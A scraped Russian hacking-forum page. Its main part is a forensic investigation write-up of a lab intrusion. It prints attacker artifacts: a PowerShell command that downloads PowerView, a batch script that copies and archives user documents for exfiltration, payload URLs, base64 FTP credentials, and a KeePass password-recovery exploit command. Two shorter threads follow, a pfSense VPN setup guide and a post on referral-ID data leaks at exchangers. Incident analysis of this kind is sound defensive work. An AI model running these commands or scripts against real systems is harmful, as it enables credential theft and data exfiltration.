![SMB- сессии](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36134%2Fsmb- wireshark.png&hash=f8767743a48b052796fde9c0a3f6f773)
Сессия связана с Kali, можем предположить, что используется утилита impacket- psexec.

Время сетевого взаимодействия: 11:25:09.263058 — 11:33:35.584495.

RDP

Продолжим анализ сетевых сессий и проверим наличие RDP:

Code:Copy to clipboard

fuse | 172.17.79.131 | _path=="conn" | cut ts,id | 3389

![RDP- сессии](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36132%2Frdp- zui.png&hash=caae507c3f7de204c86514ed7e44c7ce)
Посмотрим в Wireshark:

Code:Copy to clipboard

tcp.port==3389

![RDP- сессии](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36131%2Fwireshark- rdp.png&hash=075a6b5f3f543e4d959c6f8ebe8ab63d)
Время сетевого взаимодействия: 12:18:35.508604 — 12:23:34.962134

Добавим информацию о IoC.
![Информация о IoC](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36133%2Fioc- ftp.png&hash=54e3d4c34ef4b4bc4918928b68046b0d)

И о событиях.

![Таймлайн инцидента](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36130%2Firis- timeline-1.png&hash=e8d5d2829fab8bcce03a41a8c7e27970)
В результате анализа трафика мы узнали, что злоумышленнику удалось скомпрометировать учетные данные для хоста Forela-Wkstn002.forela.local, эксфильтровать дамп процесса и базу данных KeePass, а также архив с проектом.

АНАЛИЗИРУЕМ ЖУРНАЛЫ СОБЫТИЙ WINDOWS

Начнем анализ артефактов Windows, для чего снова пустим в ход Hayabusa.

Посмотрим сводку по авторизациям:

Code:Copy to clipboard

./hayabusa logon-summary -d ~/Hunter_Acquisition/Acquisition/2023-06-22T092426_Acquisition/C/

![Сводка по авторизациям](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36129%2Fauth- hayabusa.png&hash=1417fef7ed55309c4791c907b6356bb2)
Можем подтвердить, что с хоста 172.17.79.133 (Kali) было подключение по RDP.

Запустим анализ событий правилами Sigma и hayabusa-rules:

Code:Copy to clipboard

./hayabusa csv-timeline -d ~/C/ --output ~/hayabusa_last.csv --UTC

![Сводка по правилам](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36128%2Fsummary- rules-hayabusa.png&hash=3e2c8369a675cf620f4e9e9a990e96d4)
Сразу в глаза бросаются алерты:

Defender Alert;

PowerView PowerShell Cmdlets — ScriptBlock.

Дальше работать с результатами Hayabusa будем в ZUI.

Давай поищем авторизации с Kali:

Code:Copy to clipboard

EventID==4624. | 172.17.79.133

![Авторизации с Kali](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36127%2Fauth- logs.png&hash=260fbacf6b5fa076c94a176bbcced1ec)
Наши предположения об авторизациях подтвердились.

PsExec

Отфильтруем события по Logon ID 0x26fbee и увидим последовательность событий, похожую на работу PsExec. Далее поищем события, связанные с созданием служб в нужный нам интервал времени: EventID==7045. | "2023-06-21"

![Обнаружение PsExec](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36126%2Fpsexec- eventlog.png&hash=ec747259c68748dcde4ce66fed2deb6a)
К индикаторам можем отнести название исполняемого файла и имя службы:

служба: tFdj;

путь к исполняемому файлу: %systemroot%\\owUjOMCY.exe;

время: 2023-06-21T11:19:34.

Детектируем горизонтальное перемещение с SMBExec и AtExec (Хабрахабр)

К сожалению, событий создания или завершения процесса в нашем интервале нет.
![Отсутствие событий создания или завершения процессов](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36125%2Fnon- existing-proc-create.png&hash=140b6af9d20f20b8e21383c7feeb370b)
Давай отсортируем по типам правил:

Code:Copy to clipboard

"06-21" | count() by RuleTitle | sort -r count

И точечно посмотрим на некоторые.

Meterpreter

Code:Copy to clipboard

"06-21" | RuleTitle=="Antivirus Hacktool Detection"

Событие с EventId=1116 из журнала Microsoft-Windows-Windows Defender/Operational:

Code:Copy to clipboard

Threat: Trojan:Win64/Meterpreter.E ¦ Severity: Severe ¦ Type: Trojan ¦ User: NT AUTHORITY\SYSTEM ¦ Path: file:_C:\Users\alonzo.spire\notepad.exe; shellopencmd:_HKLM\SOFTWARE\CLASSES\txtfile\shell\open\command\\ ¦ Proc: Unknown

Оно сигнализирует нам о том, что файл C:\Users\alonzo.spire\notepad.exe определен как Trojan:Win64/Meterpreter.E. и пытался закрепиться или закрепился, используя следующую ветку реестра:

Code:Copy to clipboard

HKLM\SOFTWARE\CLASSES\txtfile\shell\open\command\\

Время обнаружения: 2023-06-21 12:33:55.002.

Загружаем PowerView

Посмотрим события, связанные с работой PowerShell.

Code:Copy to clipboard

"06-21" | PwSh | Details!="HostApplication: n/a"

В результате получим много событий EventId=4104 и одно событие EventId=400.

Событие ниже свидетельствует о загрузке злоумышленником утилиты PowerView, предназначенной для постэксплуатации в средах Active Directory. Утилита сохранена с именем clean.ps1.

Время регистрации события — 2023-06-21 11:30:40.755.

Code:Copy to clipboard

Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.19041.2673 HostId=b9505ee1-faf5-41b3-af08-7dddad696ee3 HostApplication=powershell -c (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'clean.ps1') EngineVersion=5.1.19041.2673 RunspaceId=248a767b-db92-435f-bda4-5e42213ebf64 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None

События 4104 регистрируют куски кода PowerView, которые используют подозрительные функции.

RDP

Давай уточним время работы хакера по RDP. Для этого еще раз обратимся к событиям авторизации и к журналам:

Terminal-Services-RemoteConnectionManager/Operational;

TerminalServices-LocalSessionManager/Operational.

Code:Copy to clipboard

"06-21" | 4624. or "RDS-"

![Авторизации RDP](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36124%2Frdp- auth.png&hash=1cb791f5000d187ca1abaca6e6c8935b)
Можем предположить, что RDP-сессия длилась с 2023-06-21 11:44:51.426 по 2023-06-21 12:53:45.809.

Просмотр и анализ логов RDP-подключений в Windows (WinITPro)

RDP Flowchart (PDF, Google Drive)

DFIR-03: RDP Authentication Artifacts (Cyb3rSn0rlax)

На этом интересные события закончились, не забудем внести информацию в IRIS.

АРТЕФАКТЫ ВЫПОЛНЕНИЯ ПРОЦЕССОВ

SRUM

Начнем со [SRUM (Windows System Resource Usage Monitor)](https://www.youtube.com/watch?v=Uw8n4_o- ETM&list=PLlv3b9B16ZadqDQH0lTRO4kqn2P1g9Mve&index=3&t=1s&ab_channel=13Cubed), так как в нашем инциденте много сетевых взаимодействий.

Получим информацию из SRUM в виде JSON с помощью тулзы сhainsaw.

Code:Copy to clipboard

./chainsaw analyse srum -s ./2023-06-22T092426_Acquisition/C/Windows/System32/config/SOFTWARE ./2023-06-22T092426_Acquisition/C/Windows/System32/SRU/SRUDB.dat -o ./srum_chainsaw.json

В результате имеем вывод, как на скриншоте ниже.

![Вывод работы chainsaw](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36123%2Fchainsaw- out.png&hash=2cb8efe422bc8b71081a95040a236700)
Загрузим полученный файл в ZUI и начнем анализ с таблицы Windows Network Data Usage Monitor.

Code:Copy to clipboard

over this | TableName=="Windows Network Data Usage Monitor" | fuse | cut TimeStamp, UserName, AppName, AppId, BytesRecvd, BytesSent | sort -r TimeStamp

Code:Copy to clipboard

2023-06-21T12:53:00Z \device\harddiskvolume3\program files\filezilla ftp client\filezilla.exe

![FileZilla, сетевое взаимодействие из SRUM](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36145%2Fsrum- filezilla.png&hash=cefe5ee457fb6586d73954aa82d751ed)

Code:Copy to clipboard

2023-06-21T12:53:00Z \device\harddiskvolume3\windows\system32\certutil.exe

![Certutil, сетевое взаимодействие из SRUM](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36148%2Fcertutil- srum.png&hash=2542f1486c7c46aabedc0517f0005426)

Code:Copy to clipboard

2023-06-21T12:17:00Z \device\harddiskvolume3\windows\system32\windowspowershell\v1.0\powershell.exe

![PowerShell, сетевое взаимодействие из SRUM](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36143%2Fpowershell- srum.png&hash=e78973c4a47342b6be476606946b49f7)

Code:Copy to clipboard

2023-06-21T12:17:00Z \device\harddiskvolume3\windows\system32\certutil.exe

![Certutil, сетевое взаимодействие из SRUM](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36148%2Fcertutil- srum.png&hash=2542f1486c7c46aabedc0517f0005426)

Code:Copy to clipboard

2023-06-21T12:17:00Z \device\harddiskvolume3\program files\process hacker 2\processhacker.exe

![Process Hacker, сетевое взаимодействие SRUM](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36141%2Fprocess- hacker-srum.png&hash=05b8f8e5034bca55189bed33683117b8)
Можем предположить, что данные украли с использованием FileZilla, а дамп процесса KeePass сделали через Process Hacker. Новым обстоятельством для нас становится использование тулзы certutil, которая позволяет загружать файлы.

Давай посмотрим информацию в таблице App Timeline Provider. После выполнения PsExec злоумышленник получает доступ в контексте учетной записи NT AUTHORITY\System. Следующий запрос поможет нам понять, какие процессы запускал хакер.

Code:Copy to clipboard

over this | "06-21" | TableName=="Application Resource Usage Provider" or TableName=="App Timeline Provider" | fuse | cut TimeStamp,EndTime, DurationMS, UserName, AppName, TableName | sort -r EndTime | UserName=="systemprofile"

![Процессы пользователя SYSTEM](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36122%2Fprocess- srum-system.png&hash=4888877c94a37a73d65fdf1014d593d1)
Можем предположить, что были выполнены команды net1.exe, net.exe и PowerShell. Запуск PowerShell совпадает со временем регистрации загрузки PowerView.

Какие процессы были связаны с пользователем alonzo.spire?

Code:Copy to clipboard

over this | "06-21" | TableName=="Application Resource Usage Provider" or TableName=="App Timeline Provider" | fuse | cut TimeStamp,EndTime, DurationMS, UserName, AppName, TableName | sort -r EndTime | UserName=="alonzo.spire"

Из SRUM мы узнали, что пользователь alonzo.spire создавал такие процессы:

keepass;

filezilla;

powershell;

powershell_ise;

WinRAR;

RAR;

ProcessHacker.

Prefetch

Давай заглянем в Prefetch-файлы, они содержат время последних восьми запусков процесса и информацию о файлах, с которыми процесс взаимодействовал.

Файлы Prefetch расположены в C:\Windows\prefetch\. Парсим их скриптом и закидываем в ZUI. Начнем анализ с данных, которые у нас уже есть.

Сессия PsExec

Служба PsExec — owujomcy.exe (over this | sort -r last_exec_time).

На скриншоте выше представлены процессы, предположительно связанные с сессией PsExec: owujomcy.exe, cmd.exe, whoami.exe, certuril.exe, powershell.exe, net.exe, net1.exe. Похоже на стандартный набор команд, выполняемых при компрометации машины.

Опытный читатель знает, что в Prefetch хранится информация о взаимодействии процесса с другими файлами в первые десять секунд его работы. Как мы видим из скриншота выше, времени между командами прошло гораздо больше.

В файлах и директориях, связанных с процессом certutil.exe, аномалий не нашлось, поэтому можем убрать его из цепочки процессов выше.

Время запуска процессов:

WHOAMI.EXE — 2023-06-21T11:19:59.915253;

POWERSHELL.EXE — 2023-06-21T11:30:39.567358 (совпадает со временем загрузки PowerView, но в связях отсутствует файл clean.ps1);

NET1.EXE — 2023-06-21T11:33:20.404245;

NET.EXE — 2023-06-21T11:33:20.326231.

RDP-сессия

Давай посмотрим процессы, которые предположительно относятся к RDP-сессии.

Сравниваем с результатами, полученными из SRUM. Ничего нового не появилось, но давай глянем еще данные о прошлых запусках и о связанных файлах.

Время запусков powershell.exe:

2023-06-21T11:51:01.844703;

2023-06-21T11:20:59.195584;

2023-06-21T11:20:28.235246;

2023-06-21T11:20:21.166621;

2023-06-21T11:19:56.205089;

2023-06-21T11:19:49.169370;

2023-06-21T11:19:30.172513;

2023-06-21T11:19:11.784861.

Время запусков FILEZILLA.EXE:

2023-06-21T11:59:54.640629;

2023-06-21T11:59:46.703003.

В связанных файлах ничто не указывает на эксфильтрацию, но мы помним про первые десять секунд.

Процесс RAR.exe предоставил достаточно новой информации: RAR.EXE — 2023-06-21T12:13:15.784399.

![Файлы, связанные с процессом RAR.exe](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36115%2Frar- exe1.png&hash=87dab92a99e45485e1f2dff6c6e8d99c)![Файлы, связанные с процессом RAR.exe](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36114%2Frar- exe2.png&hash=6a65e8cc27602b7c290bed25b8f10537)
На скриншотах выше мы видим, что хакер создал директорию Exfil и копировал туда файлы.

Процесс winrar.exe:

2023-06-21T12:18:04.408710;

2023-06-21T12:07:55.183899.

![Файлы, связанные с процессом winrar.exe](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36112%2Fprefetch- winrar.png&hash=22011a3ad771ca907e0104374df7745e)

Процесс certutil.exe:

2023-06-21T12:29:49.237697;

2023-06-21T12:29:42.612611;

2023-06-21T12:12:35.575593.

В связях нашлось кое‑что интересное.

![Файлы, связанные с процессом certutil.exe](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36113%2Fprefetch- certutil.png&hash=db01f9677c1453b62460e20227eeee0b)
Из общей картины в глаза бросаются файлы вот в этом пользовательском каталоге:

Code:Copy to clipboard

\VOLUME{01d951602330db46-52233816}\USERS\ALONZO.SPIRE\

Вот их полный список:

Code:Copy to clipboard

APPDATA\LOCALLOW\MICROSOFT\CRYPTNETURLCACHE\METADATA\3DC3856568F41DEBDC478970629B1FC6 APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\4TSWMJTT\NOTEPAD[1].EXE NOTEPAD.EXE APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\TFR2JWYD\NOTEPAD[1].EXE APPDATA\LOCALLOW\MICROSOFT\CRYPTNETURLCACHE\METADATA\A3CEB2B928510B461A9B19D9B4B8D5B6 APPDATA\LOCALLOW\MICROSOFT\CRYPTNETURLCACHE\CONTENT\A3CEB2B928510B461A9B19D9B4B8D5B6 APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\OOI66Y9I\SCOUT[1].BAT PICTURES\SCOUT.BAT

Поиск строки user-agent с упоминанием certutil в трафике не дал результатов, скорее всего, из‑за того, что дамп неполный.

Нам предстоит узнать содержимое файла scout.bat и notepad.exe.

Shimcache и Amcache

Продолжим анализ артефактов, указывающих на запуск или наличие файлов процессов Shimcache и Amcache. Для их анализа будем использовать chainsaw и ZUI.

При анализе Shimcache стоит помнить, что в нем могут храниться файлы, которые не [запускались, а были отображены](https://www.thedfirspot.com/post/evidence- of-program-existence-shimcache) в проводнике Windows (explorer.exe).

Ничего нового мы не обнаружили, за исключением времени последнего изменения файла: C:\Users\alonzo.spire\notepad.exe запускался в 2023-06-21T12:29:49.597Z.

Перейдем к [Amcache](https://cyber.gouv.fr/sites/default/files/2019/01/anssi- coriin_2019-analysis_amcache.pdf). Для его анализа воспользуемся утилитой RegRipper.

Code:Copy to clipboard

regripper -r /data/Amcache.hve -p amcache

В Amcache удалось найти хеш SHA-1 файла службы PsExec:

Code:Copy to clipboard

2023-06-21T11:33:14.594430700Z c:\windows\owujomcy.exe 23873bf2670cf64c2440058130548d4e4da412dd

![VirusTotal PsExec](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36140%2Fpsexec- vt.png&hash=a58f7ecd2e118c6add6b8aefcc291ca7)

АРТЕФАКТЫ ФАЙЛОВОЙ И ОПЕРАЦИОННОЙ СИСТЕМЫ

$MFT

Спарсим C:$MFT утилитой [MFT](https://github.com/omerbenamram/mft?tab=readme- ov-file) и загрузим данные в ZUI.

Найдем, где были сохранены файлы clean.ps1 и Scout.bat.

![Расположение clean.ps1](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36110%2Fmft- clean-ps1.png&hash=b3bddfdd81e4a952d2338231210083b3)![Расположение Scout.bat](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36109%2Fscout- bat.png&hash=b7c1c1224685e2df4713529bad519278)
Посмотрим, есть ли информация о файлах, которые хакер эксфильтровал:

Code:Copy to clipboard

fuse | keepassproc.zip or Database.kdbx or redacted

![Информация об эксфильтрованных файлах](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36107%2Fexfil- file-info.png&hash=0de05d8d1b94236bd150c1d36a65d39b)![Время создания дампа процесса KeePass](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36106%2Fkeepass- dmp.png&hash=d054315d895ef981009e223bb402ccf7)
Из скриншота выше мы узнаем, что дамп процесса KeePass был сделан в 2023-06-21T12:06:42.281943Z.

Windows Search Database

В качестве последнего артефакта ОС рассмотрим [Windows Search Database](https://www.aon.com/cyber-solutions/aon_cyber_labs/windows-search- index-the-forensic-artifact-youve-been-searching-for/). Для его анализа воспользуемся утилитой sidr.

Code:Copy to clipboard

./sidr ~./2023-06-22T092426_Acquisition/C/ -f json -o ~/sidr/

В результате мы получили три файла:

File_Report_20240503_120219.452284.json;

Internet_History_Report_20240503_120219.452528.json;

Activity_History_Report_20240503_120219.452589.json.

Нас интересует первый файл, давай загрузим его в ZUI.

Посмотрим, какие расширения файлов есть в базе:

Code:Copy to clipboard

fuse | "06-21" | count() by System_ItemType | sort -r count

![Расширения файлов в Windows Search Database](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36108%2Ffile- ext-sidr.png&hash=aaf63da2f12346f7b4e363f32a5102f7)
Наибольший интерес для нас представляет информация о .bat:

Code:Copy to clipboard

fuse | "06-21" | System_ItemType==".bat

![Информация о файле Scout.bat](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36105%2Fsidr- bat.png&hash=ff910946aed158cc061166d21c0de0a2)
В последнем столбце — часть содержимого batch-файла. Скрипт ниже представлен не полностью, поскольку остальные строки в нем закомментированы.

Code:Copy to clipboard

set "source=%userprofile%" set "destination=%temp%\Exfil" if not exist "%destination%" mkdir "%destination%" for /r "%source%" %%a in (*.docx *.docm *.pdf *.xls *.txt *.ppt *.xlsx *.pptx) do ( copy "%%a" "%destination%" ) cd %TEMP%\Exfil "C:\Program Files\WinRAR\Rar.exe" a Exfil

Вот что делает скрипт:

устанавливаются переменные source и destination;

если директория %temp%\Exfil отсутствует, она создается;

копируются файлы, подходящие под маску;

создается архив %TEMP%\Exfil\Exfil.rar.

АРТЕФАКТЫ ИСПОЛЬЗУЕМЫХ ПРИЛОЖЕНИЙ И УТИЛИТ

FileZilla

В директории можем посмотреть конфиг FileZilla.

C:\Users\alonzo.spire\AppData\Roaming\FileZilla\recentservers.xml

XML:Copy to clipboard

<?xml version="1.0" encoding="UTF-8"?> <FileZilla3 version="3.63.2.1" platform="windows"> <RecentServers> <Server> <Host>13.235.18.128</Host> <Port>21</Port> <Protocol>0</Protocol> <Type>0</Type> <User>theyoungwolf</User> <Pass encoding="base64">VGhlTG9uZ05pZ2h0SXNDb21pbmc=</Pass> <Logontype>1</Logontype> <PasvMode>MODE_DEFAULT</PasvMode> <EncodingType>Auto</EncodingType> <BypassProxy>0</BypassProxy> </Server> <Server> <Host>ypmlads.ftp.fileserver</Host> <Port>4825</Port> <Protocol>0</Protocol> <Type>0</Type> <User>cyberjunkie</User> <Pass encoding="base64">VWlvbnNrSEdUTERT</Pass> <Logontype>1</Logontype> <PasvMode>MODE_DEFAULT</PasvMode> <EncodingType>Auto</EncodingType> <BypassProxy>0</BypassProxy> </Server> <Server> <Host>13.45.67.23</Host> <Port>21</Port> <Protocol>0</Protocol> <Type>0</Type> <User>alonzo.spire</User> <Pass encoding="base64">VGhlQXdlc29tZUdyYXBl</Pass> <Logontype>1</Logontype> <PasvMode>MODE_DEFAULT</PasvMode> <EncodingType>Auto</EncodingType> <BypassProxy>0</BypassProxy> </Server> </RecentServers> </FileZilla3>

Изучив этот файл, можем предположить, что хакер пытался подключиться к нескольким FTP-серверам. Добавим их в IoC.

Certutil

Кеш утилиты certutil (yet) находится в этой директории:

Code:Copy to clipboard

C:\Users\alonzo.spire\AppData\LocalLow\Microsoft\CryptnetUrlCache

Содержимое Scout.bat:

Code:Copy to clipboard

C:\Users\alonzo.spire\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A3CEB2B928510B461A9B19D9B4B8D5B6

URL для загрузки Scout.bat:

Code:Copy to clipboard

hxxp://oakfurnitures.uk/ovxlabd/campaign/uk_orgs/Scout.bat

Найти этот URL можно здесь:

Code:Copy to clipboard

C:\Users\alonzo.spire\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A3CEB2B928510B461A9B19D9B4B8D5B6

URL для загрузки notepad.exe:

Code:Copy to clipboard

hxxp://oakfurnitures.uk/ovxlabd/campaign/uk_orgs/notepad.exe

Находится в этом файле:

Code:Copy to clipboard

C:\Users\alonzo.spire\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\cat 3DC3856568F41DEBDC478970629B1FC6

История PowerShell

Историю команд, выполняемых в консоли PowerShell, можем найти в следующем файле:

Code:Copy to clipboard

C:\Users\alonzo.spire\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Его содержимое представлено ниже. Выполняются команды из PowerView.

Code:Copy to clipboard

powershell -ep bypass . .\clean.ps1 Get-NetDomainController Get-NetDomainUsers Get-NetUsers Get-NetUser

KeePass CVE-2023-32784

Настало время разобраться с дампом процесса KeePass и с украденной базой паролей. Для эксплуатации уязвимости я воспользовался скриптом с GitHub. Дамп хранится в архиве с паролем, и могу сказать, что наш хакер не очень любит использовать разные пароли.

Для использования скрипта введем команду

Code:Copy to clipboard

python3 keepass_dump.py -f ~/Downloads/Hunter_Acquisition/keepassproc.dmp --recover

В результате получим восстановленный пароль от KDBX, в котором хранятся учетные данные администратора домена Active Directory.

ВЫВОДЫ

В процессе расследования мы вспомнили, где искать некоторые артефакты Windows, файловой системы NTFS и утилит, которыми могут пользоваться хакеры.

Мы воссоздали таймлайн инцидента в IRP. Ниже — получившаяся полная картина.

![Таймлайн инцидента](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36104%2Ffinal- timeline.png&hash=5c5ff8f1403bc4ecaea87f27c4fc63ba)

В заключение хочу посоветовать аналитикам внимательно подходить к изучению артефактов и собирать инструментарий на все случаи жизни.

Автор @d3f0x0
Источник xakep.ru

Анонимный сёрфинг через VPN шлюз на pfSense

ID: 676533bbb4103b69df371a58
Thread ID: 55714
Created: 2021-08-22T23:29:20+0000
Last Post: 2023-05-27T11:32:33+0000
Author: zln
Replies: 6 Views: 633

Итак, у нас есть ExpressVPN или ещё что, и мы хотим загнать трафик всей нашей сетки в трубу этого VPN, да так, чтобы не произошло никаких неожиданных утечек трафика "мимо", в т.в. DNS Leak. Используем pfSense.

Схема работоспособна только когда для соединения с провайдером используется PPP* (PPPoE, PPP, L2TP, PPTP) или статический адрес - на данный момент невозможно отключить приём DNS серверов провайдера по DHCP (если только ковырять исходники)

Скачиваем последнюю (2.5.2 на момент статьи) версию с https://www.pfsense.org/download/ и ставим на свой шлюз-сервечок

После дефолтного визарда и настройки OpenVPN на странице VPN / OpenVPN / Clients, далаем следующие полезные вещи:
1. В последней версии pfSense появилась возможность использовать DNS форвардер получаемый при подключении по OpenVPN,
т.к. ExpressVPN при каждом подключении выдаёт новый IP и новый IP своего DNS сервера, это то что нужно!
1.1 Активируется на странице настройки OpenVPN клиента (Pull DNS):

1.2 Добавляем (Add) и активируем (Enable, после нажатия на названии интерфейса) наш OpenVPN интерфейс на странице Interfaces / Interface Assignments:

1.3 Включаем использование DNS Forwarders на странице Services / DNS Resolver (DNS Query Forwarding):

И выбираем наш OpenVPN интерфейс в списке Outgoing Interfaces.
1.4 Отключаем DNS Server Override и переключаем DNS Resolution Behavior в Use Local DNS на странице System / General Setup:

чтобы сам pfSense не DNSил куда не надо
1.5 Заворачиваем DNS запросы из нашей LAN сети на DNS Resolver pfSense'а,
описано тут: <https://docs.netgate.com/pfsense/en/latest/recipes/dns- redirect.html> - попросту создаётся правило которое перенаправляет всё что идёт на 53 UDP/TCP порт на DNS Resover. Если надо можно повторить для IPv6.
1.6 Прямо под этим правилом создаём другое, перенаправляющее LAN сетку в OpenVPN туннель, для этого создаём простое правило any/any всё протоколы, но указываем в Advanced / Gateway полученный OpenVPN шлюз.
1.7 Удаляем "Default Allow to any LAN rule", чтобы LAN сетка не вылазила наружу при падении VPN соединения.
1.8 Исключаем DNS Leak через DNS-over-HTTPS или ещё каким способом, для этого ставим пакет pfBlockerNG-devel и на странице Firewall / pfBlockerNG / DNSBL / SafeSearch включаем блокировку DoH серверов и выбираем весь список (ctrl+a):

1.8.1 Также добавляем IP фиды для блокировки DNS серваков на станице Firewall / pfBlockerNG / Feeds и выбираем там все Public DNS фиды. Перезапускаем pfBlockerNG -> Update + Force.
1.9 Проверям DNS Leak на странице <https://www.expressvpn.com/dns-leak- test>

p.s. можно угареть по pfBlockerNG и понадабавлять кучу фидов блокирующих рекламу и трекинг (и вообще много чего)

Биржи [ Часть 1 ]

ID: 676533bbb4103b69df3719dc
Thread ID: 102996
Created: 2023-11-25T21:06:09+0000
Last Post: 2023-11-26T12:10:50+0000
Author: grozdniyandy
Prefix: Статья
Replies: 2 Views: 632

Без опасные конечно же

История

Итак, как всегда, я сижу в кафе и чекаю свою электронную почту. Я вижу сообщение о том, что получил вознаграждение и думаю: "Это круто; пришло время как-нибудь его обналичить". Это первый раз, когда я участвую в российской баунти-программе. Прежде чем слишком углубляться в детали, ~~будучи гением~~ , ~~которым я являюсь~~ , я решаю проверить сервисы, которые позволяют вам получать деньги с банковского счета и расплачиваться криптовалютой.

Услуги

Я решил изучить два сервиса, которые пока сохраню в секрете. Мы все знаем о BestChange, верно? Итак, я решаю проверить рандомный сервис. Я открываю Burp Suite и наблюдаю за поступающими запросами. Я нажимаю на один из сервисов, перечисленных на BestChange, и, как вы знаете, BestChange перенаправляет вас на другой сервис, используя свой собственный реферальный код. Давайте назовем это идентификатором, который помогает бирже понять, что трафик исходит от BestChange. Здесь происходит самая странная вещь, то, что я никогда бы не подумал возможным.

Да начнётся тех. часть

Как вы можете видеть на изображении ниже, когда мы нажимаем на один из обменников от Best Change, у каждого из них есть определенный идентификатор. При нажатии мы получаем страницу, которая загружает функцию JavaScript "location.replace", перенаправляющую нас на это местоположение.

Изображение [1]

После перенаправления сервис отправляет запрос с параметром "r", предположительно означающим "реферал", и значение этого параметра устанавливается равным "bestchange". В ответ мы получаем идентификатор пользователя BestChange, имя, фамилию и роль. Я предполагаю, что BestChange будет использовать эту учетную запись для входа в систему и получения доходов от рефералов, но я не могу быть уверен. Я не знаком с тем, как работает BestChange; это всего лишь один из возможных сценариев.

Изображение [2]

Каковы потенциальные проблемы на данный момент?
Из текущей ситуации вытекает несколько потенциальных проблем. Во-первых, хотя BestChange применил правильный подход, зарегистрировавшись под вымышленными именами и фамилиями, проблема заключается в том, что обычно мы не должны иметь возможности просматривать имена, фамилии или роли пользователей. Однако эта функция непреднамеренно приводит к утечке этой информации. Если сотрудник Best Change зарегистрируется с реальными данными, это может привести к серьезной проблеме.

Более того, возникает еще одна потенциальная проблема, если кто-то вводит идентификатор реферала одного из пользователей. В этом случае они получат доступ к данным соответствующего пользователя. Это представляет явную угрозу конфиденциальности и безопасности, поскольку потенциально может привести к раскрытию конфиденциальной информации о пользователях, которые не хотели, чтобы их данные были доступны таким образом. Так что даже на имена ~~дропов~~ знакомых лучше не регаться.

~ Мы можем сменить имя и фамилию, это не так уж и важно.

